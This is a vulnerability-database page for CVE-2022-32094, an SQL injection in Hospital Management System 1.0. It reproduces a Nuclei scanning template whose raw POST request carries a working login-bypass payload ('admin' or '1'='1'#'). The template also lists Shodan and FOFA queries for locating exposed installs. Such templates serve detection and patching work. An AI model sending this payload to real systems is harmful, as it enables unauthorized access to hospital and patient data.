Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-32094
HistorySep 14, 2022 - 12:54 p.m.

Hospital Management System 1.0 - SQL Injection

2022-09-1412:54:03
ProjectDiscovery
github.com
5

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.016 Low

EPSS

Percentile

87.5%

Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-32094

info:
  name: Hospital Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32094
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-32094
    cwe-id: CWE-89
    epss-score: 0.02031
    epss-percentile: 0.88909
    cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: hospital_management_system_project
    product: hospital_management_system
    shodan-query:
      - http.html:"Hospital Management System"
      - http.html:"hospital management system"
    fofa-query: body="hospital management system"
  tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project

http:
  - raw:
      - |
        POST /hms/doctor/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>Doctor  | Dashboard</title>'
          - 'View Appointment History'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210087de6ada1683a1a51701be853213fd17a52e0ceadf9e76a52956160d31e53b35022100ccc4f03728b7b94e2eeb0c74b621dbd6706275c3903296b5c0ec03918c7e08c5:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.016 Low

EPSS

Percentile

87.5%

Related for NUCLEI:CVE-2022-32094